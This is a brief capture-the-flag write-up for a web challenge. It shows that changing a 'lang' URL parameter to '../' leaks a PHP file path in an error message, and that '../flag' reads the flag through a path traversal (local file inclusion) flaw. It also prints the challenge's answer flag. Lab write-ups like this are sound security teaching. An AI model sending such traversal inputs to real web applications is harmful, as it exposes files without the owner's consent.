Category

Web

Description

During a pentest on this website, you notice something is off. This web app might be using the path to a file as input! Can you figure out what the vulnerability is and exploit it to find the flag?

Solution

When opening the challenge, we can see one parameter that is used.

http://3.143.112.206/?lang=en

If we change the url to http://3.143.112.206/?lang=../ we get a error message.

Warning: file_get_contents(../lang/../.txt): Failed to open stream: No such file or directory in /var/www/html/index.php on line 56

If we then change the url to http://3.143.112.206/?lang=../flag we get the flag.

ASV{LFI_FTW_2EZ}